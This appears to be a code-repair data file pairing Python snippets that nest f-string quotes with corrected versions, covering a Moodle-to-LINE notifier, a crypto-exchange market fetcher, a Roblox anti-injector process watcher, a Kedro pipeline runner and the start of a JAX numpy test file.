if int(assingment["timemodified"]) >= currentTime-dayTime and currentTime <= int(assingment["duedate"]):
dueDate = datetime.datetime.utcfromtimestamp(
int(assingment['duedate'])+GMT8).strftime('%Y-%m-%d %H:%M:%S')
lotify.send_message(
lineToken, f"{course["fullname"]}\n作業: {assingment["name"]}\nDue: {dueDate}\nCheck it on moodle")
if int(assingment["timemodified"]) >= currentTime-dayTime and assingment["duedate"] == 0:
lotify.send_message(
lineToken, f"{course["fullname"]}\n作業: {assingment["name"]}\nCheck it on moodle")
# quiz notify
typeParams["wsfunction"] = "mod_quiz_get_quizzes_by_courses"
quizzes = requests.get(url, typeParams).json()["quizzes"]
for quiz in quizzes:
if currentTime <= int(quiz["timeclose"]) and int(quiz["timeopen"]) >= currentTime-dayTime:
closeTime = datetime.datetime.utcfromtimestamp(
int(quiz['timeclose'])+GMT8).strftime('%Y-%m-%d %H:%M:%S')
lotify.send_message(
lineToken, f"{course["fullname"]}\n考試: {quiz["name"]}\nClose time: {closeTime}\nCheck it on moodle")
if __name__ == "__main__":
moodle_notify()
| import requests
import datetime
import time
import os
from lotify.client import Client
def moodle_notify():
lotify = Client()
moodleToken = os.environ.get("MOODLE_TOKEN")
lineToken = os.environ.get("LINE_TOKEN")
url = f"{os.environ.get('MOODLE_URL')}webservice/rest/server.php"
currentTime = int(time.time())
dayTime = 86400
GMT8 = 28800
params = {"moodlewsrestformat": "json",
"wsfunction": "core_webservice_get_site_info", "wstoken": moodleToken}
userId = requests.get(url, params).json()["userid"]
params["wsfunction"] = "core_enrol_get_users_courses"
params["userid"] = userId
courses = requests.get(url, params).json()
params["wsfunction"] = "core_course_get_contents"
params.pop("userid")
typeParams = {"moodlewsrestformat": "json", "wstoken": moodleToken}
for course in courses:
params["courseid"] = course["id"]
courseContent = requests.get(url, params).json()
for i in courseContent:
modules = i["modules"]
for module in modules:
if module.get("contents") == None:
continue
for content in module["contents"]:
if int(content["timemodified"]) >= currentTime-dayTime:
lotify.send_message(
lineToken, f"{course['fullname']}\n{module['modplural']}: {module['name']}\nCheck it on moodle")
# assignments notify
typeParams["wsfunction"] = "mod_assign_get_assignments"
typeParams["courseids[0]"] = course["id"]
assignments = requests.get(url, typeParams).json()[
"courses"][0]["assignments"]
for assingment in assignments:
if int(assingment["timemodified"]) >= currentTime-dayTime and currentTime <= int(assingment["duedate"]):
dueDate = datetime.datetime.utcfromtimestamp(
int(assingment['duedate'])+GMT8).strftime('%Y-%m-%d %H:%M:%S')
lotify.send_message(
lineToken, f"{course['fullname']}\n作業: {assingment['name']}\nDue: {dueDate}\nCheck it on moodle")
if int(assingment["timemodified"]) >= currentTime-dayTime and assingment["duedate"] == 0:
lotify.send_message(
lineToken, f"{course['fullname']}\n作業: {assingment['name']}\nCheck it on moodle")
# quiz notify
typeParams["wsfunction"] = "mod_quiz_get_quizzes_by_courses"
quizzes = requests.get(url, typeParams).json()["quizzes"]
for quiz in quizzes:
if currentTime <= int(quiz["timeclose"]) and int(quiz["timeopen"]) >= currentTime-dayTime:
closeTime = datetime.datetime.utcfromtimestamp(
int(quiz['timeclose'])+GMT8).strftime('%Y-%m-%d %H:%M:%S')
lotify.send_message(
lineToken, f"{course['fullname']}\n考試: {quiz['name']}\nClose time: {closeTime}\nCheck it on moodle")
if __name__ == "__main__":
moodle_notify()
|
import logging
from typing import Any, Dict, List
from .utils import get_json
logging.basicConfig(level=logging.INFO)
def fetch_markets(market_type: str) -> List[Dict[str, Any]]:
'''Fetch all trading markets from a crypto exchage.'''
if market_type == 'spot':
return _fetch_spot_markets()
else:
raise ValueError(f'Unknown market type: {market_type}')
def _fetch_spot_markets() -> Dict[str, Any]:
url = 'https://global-openapi.bithumb.pro/openapi/v1/spot/config'
resp: Dict[str, Any] = get_json(url)
if resp['code'] != "0":
logging.error(f"code : {resp["code"]}, msg: {resp["msg"]}")
return {}
data = resp['data']
for x in data['coinConfig']:
del x['withdrawFee']
del x['depositStatus']
del x['withdrawStatus']
return data
| import logging
from typing import Any, Dict, List
from .utils import get_json
logging.basicConfig(level=logging.INFO)
def fetch_markets(market_type: str) -> List[Dict[str, Any]]:
'''Fetch all trading markets from a crypto exchage.'''
if market_type == 'spot':
return _fetch_spot_markets()
else:
raise ValueError(f'Unknown market type: {market_type}')
def _fetch_spot_markets() -> Dict[str, Any]:
url = 'https://global-openapi.bithumb.pro/openapi/v1/spot/config'
resp: Dict[str, Any] = get_json(url)
if resp['code'] != "0":
logging.error(f"code : {resp['code']}, msg: {resp['msg']}")
return {}
data = resp['data']
for x in data['coinConfig']:
del x['withdrawFee']
del x['depositStatus']
del x['withdrawStatus']
return data
|
from psutil import process_iter
from os import system
version = 1.0
author = 'Ivan Perzhinsky'
roblox = 'RobloxPlayerBeta.exe'
trx = 'TRX.exe'
roblox_kill_command = f'taskkill /F /IM {roblox}'
def get_processes_names():
return [proc.name() for proc in process_iter()]
def kill_roblox():
for proc in process_iter():
if proc.name() == roblox:
system(roblox_kill_command)
print('Welcome to Roblox protector from TRX injector.')
print(f'Version: {str(version).replace('.', ',')}.')
print(f'By {author}.')
print('\nStarting listener.')
print('Press [CTRL + C] to stop.\n')
while True:
try:
processes = get_processes_names()
roblox_started = roblox in processes
trx_started = trx in processes
if roblox_started and trx_started:
print('Roblox detected.')
print('TRX Detected.')
print('Killing roblox.\n')
kill_roblox()
print('\nRoblox killed.')
print('Continuing work...')
except KeyboardInterrupt:
print('\nInterrupted.')
break
| from psutil import process_iter
from os import system
version = 1.0
author = 'Ivan Perzhinsky'
roblox = 'RobloxPlayerBeta.exe'
trx = 'TRX.exe'
roblox_kill_command = f'taskkill /F /IM {roblox}'
def get_processes_names():
return [proc.name() for proc in process_iter()]
def kill_roblox():
for proc in process_iter():
if proc.name() == roblox:
system(roblox_kill_command)
print('Welcome to Roblox protector from TRX injector.')
print(f'Version: {str(version).replace(".", ",")}.')
print(f'By {author}.')
print('\nStarting listener.')
print('Press [CTRL + C] to stop.\n')
while True:
try:
processes = get_processes_names()
roblox_started = roblox in processes
trx_started = trx in processes
if roblox_started and trx_started:
print('Roblox detected.')
print('TRX Detected.')
print('Killing roblox.\n')
kill_roblox()
print('\nRoblox killed.')
print('Continuing work...')
except KeyboardInterrupt:
print('\nInterrupted.')
break
|
"""``AbstractRunner`` is the base class for all ``Pipeline`` runner
implementations.
"""
import logging
from abc import ABC, abstractmethod
from concurrent.futures import (
ALL_COMPLETED,
Future,
ThreadPoolExecutor,
as_completed,
wait,
)
from typing import Any, Dict, Iterable
from pluggy import PluginManager
from kedro.framework.hooks.manager import _NullPluginManager
from kedro.io import AbstractDataSet, DataCatalog
from kedro.pipeline import Pipeline
from kedro.pipeline.node import Node
class AbstractRunner(ABC):
"""``AbstractRunner`` is the base class for all ``Pipeline`` runner
implementations.
"""
def __init__(self, is_async: bool = False):
"""Instantiates the runner classs.
Args:
is_async: If True, the node inputs and outputs are loaded and saved
asynchronously with threads. Defaults to False.
"""
self._is_async = is_async
@property
def _logger(self):
return logging.getLogger(self.__module__)
def run(
self,
pipeline: Pipeline,
catalog: DataCatalog,
hook_manager: PluginManager = None,
session_id: str = None,
) -> Dict[str, Any]:
"""Run the ``Pipeline`` using the datasets provided by ``catalog``
and save results back to the same objects.
Args:
pipeline: The ``Pipeline`` to run.
catalog: The ``DataCatalog`` from which to fetch data.
hook_manager: The ``PluginManager`` to activate hooks.
session_id: The id of the session.
Raises:
ValueError: Raised when ``Pipeline`` inputs cannot be satisfied.
Returns:
Any node outputs that cannot be processed by the ``DataCatalog``.
These are returned in a dictionary, where the keys are defined
by the node outputs.
"""
hook_manager = hook_manager or _NullPluginManager()
catalog = catalog.shallow_copy()
unsatisfied = pipeline.inputs() - set(catalog.list())
if unsatisfied:
raise ValueError(
f"Pipeline input(s) {unsatisfied} not found in the DataCatalog"
)
free_outputs = pipeline.outputs() - set(catalog.list())
unregistered_ds = pipeline.data_sets() - set(catalog.list())
for ds_name in unregistered_ds:
catalog.add(ds_name, self.create_default_data_set(ds_name))
if self._is_async:
self._logger.info(
"Asynchronous mode is enabled for loading and saving data"
)
self._run(pipeline, catalog, hook_manager, session_id)
self._logger.info("Pipeline execution completed successfully.")
return {ds_name: catalog.load(ds_name) for ds_name in free_outputs}
def run_only_missing(
self, pipeline: Pipeline, catalog: DataCatalog, hook_manager: PluginManager
) -> Dict[str, Any]:
"""Run only the missing outputs from the ``Pipeline`` using the
datasets provided by ``catalog``, and save results back to the
same objects.
Args:
pipeline: The ``Pipeline`` to run.
catalog: The ``DataCatalog`` from which to fetch data.
hook_manager: The ``PluginManager`` to activate hooks.
Raises:
ValueError: Raised when ``Pipeline`` inputs cannot be
satisfied.
Returns:
Any node outputs that cannot be processed by the
``DataCatalog``. These are returned in a dictionary, where
the keys are defined by the node outputs.
"""
free_outputs = pipeline.outputs() - set(catalog.list())
missing = {ds for ds in catalog.list() if not catalog.exists(ds)}
to_build = free_outputs | missing
to_rerun = pipeline.only_nodes_with_outputs(*to_build) + pipeline.from_inputs(
*to_build
)
# We also need any missing datasets that are required to run the
# `to_rerun` pipeline, including any chains of missing datasets.
unregistered_ds = pipeline.data_sets() - set(catalog.list())
output_to_unregistered = pipeline.only_nodes_with_outputs(*unregistered_ds)
input_from_unregistered = to_rerun.inputs() & unregistered_ds
to_rerun += output_to_unregistered.to_outputs(*input_from_unregistered)
return self.run(to_rerun, catalog, hook_manager)
@abstractmethod # pragma: no cover
def _run(
self,
pipeline: Pipeline,
catalog: DataCatalog,
hook_manager: PluginManager,
session_id: str = None,
) -> None:
"""The abstract interface for running pipelines, assuming that the
inputs have already been checked and normalized by run().
Args:
pipeline: The ``Pipeline`` to run.
catalog: The ``DataCatalog`` from which to fetch data.
hook_manager: The ``PluginManager`` to activate hooks.
session_id: The id of the session.
"""
pass
@abstractmethod # pragma: no cover
def create_default_data_set(self, ds_name: str) -> AbstractDataSet:
"""Factory method for creating the default dataset for the runner.
Args:
ds_name: Name of the missing dataset.
Returns:
An instance of an implementation of ``AbstractDataSet`` to be
used for all unregistered datasets.
"""
pass
def _suggest_resume_scenario(
self, pipeline: Pipeline, done_nodes: Iterable[Node]
) -> None:
remaining_nodes = set(pipeline.nodes) - set(done_nodes)
postfix = ""
if done_nodes:
node_names = (n.name for n in remaining_nodes)
resume_p = pipeline.only_nodes(*node_names)
start_p = resume_p.only_nodes_with_inputs(*resume_p.inputs())
start_node_names = (n.name for n in start_p.nodes)
postfix += f" --from-nodes \"{",".join(start_node_names)}\""
self._logger.warning(
"There are %d nodes that have not run.\n"
"You can resume the pipeline run by adding the following "
"argument to your previous command:\n%s",
len(remaining_nodes),
postfix,
)
def run_node(
node: Node,
catalog: DataCatalog,
hook_manager: PluginManager,
is_async: bool = False,
session_id: str = None,
) -> Node:
"""Run a single `Node` with inputs from and outputs to the `catalog`.
Args:
node: The ``Node`` to run.
catalog: A ``DataCatalog`` containing the node's inputs and outputs.
hook_manager: The ``PluginManager`` to activate hooks.
is_async: If True, the node inputs and outputs are loaded and saved
asynchronously with threads. Defaults to False.
session_id: The session id of the pipeline run.
Returns:
The node argument.
"""
if is_async:
node = _run_node_async(node, catalog, hook_manager, session_id)
else:
node = _run_node_sequential(node, catalog, hook_manager, session_id)
for name in node.confirms:
catalog.confirm(name)
return node
def _collect_inputs_from_hook(
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
is_async: bool,
hook_manager: PluginManager,
session_id: str = None,
) -> Dict[str, Any]:
# pylint: disable=too-many-arguments
inputs = inputs.copy() # shallow copy to prevent in-place modification by the hook
hook_response = hook_manager.hook.before_node_run(
node=node,
catalog=catalog,
inputs=inputs,
is_async=is_async,
session_id=session_id,
)
additional_inputs = {}
if (
hook_response is not None
): # all hooks on a _NullPluginManager will return None instead of a list
for response in hook_response:
if response is not None and not isinstance(response, dict):
response_type = type(response).__name__
raise TypeError(
f"'before_node_run' must return either None or a dictionary mapping "
f"dataset names to updated values, got '{response_type}' instead."
)
response = response or {}
additional_inputs.update(response)
return additional_inputs
def _call_node_run(
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
is_async: bool,
hook_manager: PluginManager,
session_id: str = None,
) -> Dict[str, Any]:
# pylint: disable=too-many-arguments
try:
outputs = node.run(inputs)
except Exception as exc:
hook_manager.hook.on_node_error(
error=exc,
node=node,
catalog=catalog,
inputs=inputs,
is_async=is_async,
session_id=session_id,
)
raise exc
hook_manager.hook.after_node_run(
node=node,
catalog=catalog,
inputs=inputs,
outputs=outputs,
is_async=is_async,
session_id=session_id,
)
return outputs
def _run_node_sequential(
node: Node,
catalog: DataCatalog,
hook_manager: PluginManager,
session_id: str = None,
) -> Node:
inputs = {}
for name in node.inputs:
hook_manager.hook.before_dataset_loaded(dataset_name=name)
inputs[name] = catalog.load(name)
hook_manager.hook.after_dataset_loaded(dataset_name=name, data=inputs[name])
is_async = False
additional_inputs = _collect_inputs_from_hook(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
inputs.update(additional_inputs)
outputs = _call_node_run(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
for name, data in outputs.items():
hook_manager.hook.before_dataset_saved(dataset_name=name, data=data)
catalog.save(name, data)
hook_manager.hook.after_dataset_saved(dataset_name=name, data=data)
return node
def _run_node_async(
node: Node,
catalog: DataCatalog,
hook_manager: PluginManager,
session_id: str = None,
) -> Node:
def _synchronous_dataset_load(dataset_name: str):
"""Minimal wrapper to ensure Hooks are run synchronously
within an asynchronous dataset load."""
hook_manager.hook.before_dataset_loaded(dataset_name=dataset_name)
return_ds = catalog.load(dataset_name)
hook_manager.hook.after_dataset_loaded(
dataset_name=dataset_name, data=return_ds
)
return return_ds
with ThreadPoolExecutor() as pool:
inputs: Dict[str, Future] = {}
for name in node.inputs:
inputs[name] = pool.submit(_synchronous_dataset_load, name)
wait(inputs.values(), return_when=ALL_COMPLETED)
inputs = {key: value.result() for key, value in inputs.items()}
is_async = True
additional_inputs = _collect_inputs_from_hook(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
inputs.update(additional_inputs)
outputs = _call_node_run(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
save_futures = set()
for name, data in outputs.items():
hook_manager.hook.before_dataset_saved(dataset_name=name, data=data)
save_futures.add(pool.submit(catalog.save, name, data))
for future in as_completed(save_futures):
exception = future.exception()
if exception:
raise exception
hook_manager.hook.after_dataset_saved(
dataset_name=name, data=data # pylint: disable=undefined-loop-variable
)
return node
| """``AbstractRunner`` is the base class for all ``Pipeline`` runner
implementations.
"""
import logging
from abc import ABC, abstractmethod
from concurrent.futures import (
ALL_COMPLETED,
Future,
ThreadPoolExecutor,
as_completed,
wait,
)
from typing import Any, Dict, Iterable
from pluggy import PluginManager
from kedro.framework.hooks.manager import _NullPluginManager
from kedro.io import AbstractDataSet, DataCatalog
from kedro.pipeline import Pipeline
from kedro.pipeline.node import Node
class AbstractRunner(ABC):
"""``AbstractRunner`` is the base class for all ``Pipeline`` runner
implementations.
"""
def __init__(self, is_async: bool = False):
"""Instantiates the runner classs.
Args:
is_async: If True, the node inputs and outputs are loaded and saved
asynchronously with threads. Defaults to False.
"""
self._is_async = is_async
@property
def _logger(self):
return logging.getLogger(self.__module__)
def run(
self,
pipeline: Pipeline,
catalog: DataCatalog,
hook_manager: PluginManager = None,
session_id: str = None,
) -> Dict[str, Any]:
"""Run the ``Pipeline`` using the datasets provided by ``catalog``
and save results back to the same objects.
Args:
pipeline: The ``Pipeline`` to run.
catalog: The ``DataCatalog`` from which to fetch data.
hook_manager: The ``PluginManager`` to activate hooks.
session_id: The id of the session.
Raises:
ValueError: Raised when ``Pipeline`` inputs cannot be satisfied.
Returns:
Any node outputs that cannot be processed by the ``DataCatalog``.
These are returned in a dictionary, where the keys are defined
by the node outputs.
"""
hook_manager = hook_manager or _NullPluginManager()
catalog = catalog.shallow_copy()
unsatisfied = pipeline.inputs() - set(catalog.list())
if unsatisfied:
raise ValueError(
f"Pipeline input(s) {unsatisfied} not found in the DataCatalog"
)
free_outputs = pipeline.outputs() - set(catalog.list())
unregistered_ds = pipeline.data_sets() - set(catalog.list())
for ds_name in unregistered_ds:
catalog.add(ds_name, self.create_default_data_set(ds_name))
if self._is_async:
self._logger.info(
"Asynchronous mode is enabled for loading and saving data"
)
self._run(pipeline, catalog, hook_manager, session_id)
self._logger.info("Pipeline execution completed successfully.")
return {ds_name: catalog.load(ds_name) for ds_name in free_outputs}
def run_only_missing(
self, pipeline: Pipeline, catalog: DataCatalog, hook_manager: PluginManager
) -> Dict[str, Any]:
"""Run only the missing outputs from the ``Pipeline`` using the
datasets provided by ``catalog``, and save results back to the
same objects.
Args:
pipeline: The ``Pipeline`` to run.
catalog: The ``DataCatalog`` from which to fetch data.
hook_manager: The ``PluginManager`` to activate hooks.
Raises:
ValueError: Raised when ``Pipeline`` inputs cannot be
satisfied.
Returns:
Any node outputs that cannot be processed by the
``DataCatalog``. These are returned in a dictionary, where
the keys are defined by the node outputs.
"""
free_outputs = pipeline.outputs() - set(catalog.list())
missing = {ds for ds in catalog.list() if not catalog.exists(ds)}
to_build = free_outputs | missing
to_rerun = pipeline.only_nodes_with_outputs(*to_build) + pipeline.from_inputs(
*to_build
)
# We also need any missing datasets that are required to run the
# `to_rerun` pipeline, including any chains of missing datasets.
unregistered_ds = pipeline.data_sets() - set(catalog.list())
output_to_unregistered = pipeline.only_nodes_with_outputs(*unregistered_ds)
input_from_unregistered = to_rerun.inputs() & unregistered_ds
to_rerun += output_to_unregistered.to_outputs(*input_from_unregistered)
return self.run(to_rerun, catalog, hook_manager)
@abstractmethod # pragma: no cover
def _run(
self,
pipeline: Pipeline,
catalog: DataCatalog,
hook_manager: PluginManager,
session_id: str = None,
) -> None:
"""The abstract interface for running pipelines, assuming that the
inputs have already been checked and normalized by run().
Args:
pipeline: The ``Pipeline`` to run.
catalog: The ``DataCatalog`` from which to fetch data.
hook_manager: The ``PluginManager`` to activate hooks.
session_id: The id of the session.
"""
pass
@abstractmethod # pragma: no cover
def create_default_data_set(self, ds_name: str) -> AbstractDataSet:
"""Factory method for creating the default dataset for the runner.
Args:
ds_name: Name of the missing dataset.
Returns:
An instance of an implementation of ``AbstractDataSet`` to be
used for all unregistered datasets.
"""
pass
def _suggest_resume_scenario(
self, pipeline: Pipeline, done_nodes: Iterable[Node]
) -> None:
remaining_nodes = set(pipeline.nodes) - set(done_nodes)
postfix = ""
if done_nodes:
node_names = (n.name for n in remaining_nodes)
resume_p = pipeline.only_nodes(*node_names)
start_p = resume_p.only_nodes_with_inputs(*resume_p.inputs())
start_node_names = (n.name for n in start_p.nodes)
postfix += f" --from-nodes \"{','.join(start_node_names)}\""
self._logger.warning(
"There are %d nodes that have not run.\n"
"You can resume the pipeline run by adding the following "
"argument to your previous command:\n%s",
len(remaining_nodes),
postfix,
)
def run_node(
node: Node,
catalog: DataCatalog,
hook_manager: PluginManager,
is_async: bool = False,
session_id: str = None,
) -> Node:
"""Run a single `Node` with inputs from and outputs to the `catalog`.
Args:
node: The ``Node`` to run.
catalog: A ``DataCatalog`` containing the node's inputs and outputs.
hook_manager: The ``PluginManager`` to activate hooks.
is_async: If True, the node inputs and outputs are loaded and saved
asynchronously with threads. Defaults to False.
session_id: The session id of the pipeline run.
Returns:
The node argument.
"""
if is_async:
node = _run_node_async(node, catalog, hook_manager, session_id)
else:
node = _run_node_sequential(node, catalog, hook_manager, session_id)
for name in node.confirms:
catalog.confirm(name)
return node
def _collect_inputs_from_hook(
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
is_async: bool,
hook_manager: PluginManager,
session_id: str = None,
) -> Dict[str, Any]:
# pylint: disable=too-many-arguments
inputs = inputs.copy() # shallow copy to prevent in-place modification by the hook
hook_response = hook_manager.hook.before_node_run(
node=node,
catalog=catalog,
inputs=inputs,
is_async=is_async,
session_id=session_id,
)
additional_inputs = {}
if (
hook_response is not None
): # all hooks on a _NullPluginManager will return None instead of a list
for response in hook_response:
if response is not None and not isinstance(response, dict):
response_type = type(response).__name__
raise TypeError(
f"'before_node_run' must return either None or a dictionary mapping "
f"dataset names to updated values, got '{response_type}' instead."
)
response = response or {}
additional_inputs.update(response)
return additional_inputs
def _call_node_run(
node: Node,
catalog: DataCatalog,
inputs: Dict[str, Any],
is_async: bool,
hook_manager: PluginManager,
session_id: str = None,
) -> Dict[str, Any]:
# pylint: disable=too-many-arguments
try:
outputs = node.run(inputs)
except Exception as exc:
hook_manager.hook.on_node_error(
error=exc,
node=node,
catalog=catalog,
inputs=inputs,
is_async=is_async,
session_id=session_id,
)
raise exc
hook_manager.hook.after_node_run(
node=node,
catalog=catalog,
inputs=inputs,
outputs=outputs,
is_async=is_async,
session_id=session_id,
)
return outputs
def _run_node_sequential(
node: Node,
catalog: DataCatalog,
hook_manager: PluginManager,
session_id: str = None,
) -> Node:
inputs = {}
for name in node.inputs:
hook_manager.hook.before_dataset_loaded(dataset_name=name)
inputs[name] = catalog.load(name)
hook_manager.hook.after_dataset_loaded(dataset_name=name, data=inputs[name])
is_async = False
additional_inputs = _collect_inputs_from_hook(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
inputs.update(additional_inputs)
outputs = _call_node_run(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
for name, data in outputs.items():
hook_manager.hook.before_dataset_saved(dataset_name=name, data=data)
catalog.save(name, data)
hook_manager.hook.after_dataset_saved(dataset_name=name, data=data)
return node
def _run_node_async(
node: Node,
catalog: DataCatalog,
hook_manager: PluginManager,
session_id: str = None,
) -> Node:
def _synchronous_dataset_load(dataset_name: str):
"""Minimal wrapper to ensure Hooks are run synchronously
within an asynchronous dataset load."""
hook_manager.hook.before_dataset_loaded(dataset_name=dataset_name)
return_ds = catalog.load(dataset_name)
hook_manager.hook.after_dataset_loaded(
dataset_name=dataset_name, data=return_ds
)
return return_ds
with ThreadPoolExecutor() as pool:
inputs: Dict[str, Future] = {}
for name in node.inputs:
inputs[name] = pool.submit(_synchronous_dataset_load, name)
wait(inputs.values(), return_when=ALL_COMPLETED)
inputs = {key: value.result() for key, value in inputs.items()}
is_async = True
additional_inputs = _collect_inputs_from_hook(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
inputs.update(additional_inputs)
outputs = _call_node_run(
node, catalog, inputs, is_async, hook_manager, session_id=session_id
)
save_futures = set()
for name, data in outputs.items():
hook_manager.hook.before_dataset_saved(dataset_name=name, data=data)
save_futures.add(pool.submit(catalog.save, name, data))
for future in as_completed(save_futures):
exception = future.exception()
if exception:
raise exception
hook_manager.hook.after_dataset_saved(
dataset_name=name, data=data # pylint: disable=undefined-loop-variable
)
return node
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import functools
from functools import partial
import inspect
import itertools
import operator
from typing import cast, Iterator, Optional, List, Tuple
import unittest
from unittest import SkipTest
import warnings
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
try:
import numpy_dispatch
except ImportError:
numpy_dispatch = None
import jax
import jax.ops
from jax._src import api
from jax import lax
from jax import numpy as jnp
from jax import test_util as jtu
from jax._src import dtypes
from jax import tree_util
from jax.interpreters import xla
from jax.test_util import check_grads
from jax._src.util import prod
from jax._src.numpy.util import _parse_numpydoc, ParsedDoc
from jax.config import config
config.parse_flags_with_absl()
FLAGS = config.FLAGS
numpy_version = tuple(map(int, np.__version__.split('.')[:3]))
nonempty_nonscalar_array_shapes = [(4,), (3, 4), (3, 1), (1, 4), (2, 1, 4), (2, 3, 4)]
nonempty_array_shapes = [()] + nonempty_nonscalar_array_shapes
one_dim_array_shapes = [(1,), (6,), (12,)]
empty_array_shapes = [(0,), (0, 4), (3, 0),]
scalar_shapes = [jtu.NUMPY_SCALAR_SHAPE, jtu.PYTHON_SCALAR_SHAPE]
array_shapes = nonempty_array_shapes + empty_array_shapes
nonzerodim_shapes = nonempty_nonscalar_array_shapes + empty_array_shapes
nonempty_shapes = scalar_shapes + nonempty_array_shapes
all_shapes = scalar_shapes + array_shapes
float_dtypes = jtu.dtypes.all_floating
complex_dtypes = jtu.dtypes.complex
int_dtypes = jtu.dtypes.all_integer
unsigned_dtypes = jtu.dtypes.all_unsigned
bool_dtypes = jtu.dtypes.boolean
default_dtypes = float_dtypes + int_dtypes
inexact_dtypes = float_dtypes + complex_dtypes
number_dtypes = float_dtypes + complex_dtypes + int_dtypes
all_dtypes = number_dtypes + bool_dtypes
python_scalar_dtypes = [jnp.bool_, jnp.int_, jnp.float_, jnp.complex_]
# uint64 is problematic because with any uint type it promotes to float:
int_dtypes_no_uint64 = [d for d in int_dtypes + unsigned_dtypes if d != np.uint64]
def _valid_dtypes_for_shape(shape, dtypes):
# Not all (shape, dtype) pairs are valid. In particular, Python scalars only
# have one type in each category (float, bool, etc.)
if shape is jtu.PYTHON_SCALAR_SHAPE:
return [t for t in dtypes if t in python_scalar_dtypes]
return dtypes
def _shape_and_dtypes(shapes, dtypes):
for shape in shapes:
for dtype in _valid_dtypes_for_shape(shape, dtypes):
yield (shape, dtype)
def _compatible_shapes(shape):
if shape in scalar_shapes or np.ndim(shape) == 0:
return [shape]
return (shape[n:] for n in range(len(shape) + 1))
def _get_y_shapes(y_dtype, shape, rowvar):
# Helper function for testCov.
if y_dtype is None:
return [None]
if len(shape) == 1:
return [shape]
elif rowvar or shape[0] == 1:
return [(1, shape[-1]), (2, shape[-1]), (5, shape[-1])]
return [(shape[0], 1), (shape[0], 2), (shape[0], 5)]
OpRecord = collections.namedtuple(
"OpRecord",
["name", "nargs", "dtypes", "shapes", "rng_factory", "diff_modes",
"test_name", "check_dtypes", "tolerance", "inexact"])
def op_record(name, nargs, dtypes, shapes, rng_factory, diff_modes,
test_name=None, check_dtypes=True,
tolerance=None, inexact=False):
test_name = test_name or name
return OpRecord(name, nargs, dtypes, shapes, rng_factory, diff_modes,
test_name, check_dtypes, tolerance, inexact)
JAX_ONE_TO_ONE_OP_RECORDS = [
op_record("abs", 1, number_dtypes + unsigned_dtypes + bool_dtypes,
all_shapes, jtu.rand_default, ["rev"]),
op_record("add", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("ceil", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("ceil", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("conj", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("exp", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
op_record("fabs", 1, float_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("float_power", 2, inexact_dtypes, all_shapes,
partial(jtu.rand_default, scale=1), ["rev"],
tolerance={jnp.bfloat16: 1e-2, np.float32: 1e-3,
np.float64: 1e-12, np.complex64: 2e-4,
np.complex128: 1e-12}, check_dtypes=False),
op_record("floor", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("floor", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("greater", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("greater_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("i0", 1, float_dtypes, all_shapes, jtu.rand_default, [],
check_dtypes=False),
op_record("ldexp", 2, int_dtypes, all_shapes, jtu.rand_default, [], check_dtypes=False),
op_record("less", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("less_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, []),
op_record("log", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("logical_and", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("logical_not", 1, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("logical_or", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("logical_xor", 2, all_dtypes, all_shapes, jtu.rand_bool, []),
op_record("maximum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("minimum", 2, all_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("multiply", 2, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("negative", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("nextafter", 2, [f for f in float_dtypes if f != jnp.bfloat16],
all_shapes, jtu.rand_default, ["rev"], inexact=True, tolerance=0),
op_record("not_equal", 2, all_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
op_record("array_equal", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
op_record("array_equiv", 2, number_dtypes, all_shapes, jtu.rand_some_equal, ["rev"]),
op_record("reciprocal", 1, inexact_dtypes, all_shapes, jtu.rand_default, []),
op_record("subtract", 2, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("signbit", 1, default_dtypes + bool_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, ["rev"]),
op_record("trunc", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("trunc", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, [], check_dtypes=False),
op_record("sin", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
op_record("cos", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
